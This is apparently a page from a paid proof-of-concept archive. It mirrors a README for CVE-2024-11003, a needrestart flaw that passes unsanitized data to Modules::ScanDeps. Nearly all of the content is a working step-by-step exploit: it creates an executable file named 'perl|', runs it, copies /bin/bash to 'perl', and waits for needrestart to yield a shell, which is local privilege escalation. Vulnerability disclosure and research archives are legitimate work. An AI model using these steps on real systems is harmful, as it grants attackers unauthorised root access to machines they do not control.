Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-11003 PoC — needrestart 安全漏洞

Source
Associated Vulnerability
Title:needrestart 安全漏洞 (CVE-2024-11003)
Description:Qualys discovered that needrestart, before version 3.8, passes unsanitized data to a library (Modules::ScanDeps) which expects safe input. This could allow a local attacker to execute arbitrary shell commands. Please see the related CVE-2024-10224 in Modules::ScanDeps.
Description
CVE-2024-11003 Perl Poc
Readme
# CVE-2024-11003

## Steps to Exploit

### 1. Create a Perl script
Create a file named `perl|` and add the following code:

```perl
#!/usr/bin/perl

sleep(3600)
```

### 2. Make the file executable
Use the following command to make the file executable:

```bash
chmod +x perl\|
```

### 3. Run the script
Execute the script:

```bash
./perl\|
```

### 4. Copy `/bin/bash` to the same directory
Copy the `bash` binary to the same directory and rename it as `perl`:

```bash
cp /bin/bash perl
```

### 5. Wait for needrestart
Once needrestart starts, you will get a shell.
File Snapshot

[4.0K] /data/pocs/6c49ace2e321795edc2aa49da8abce85c866091c └── [ 571] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →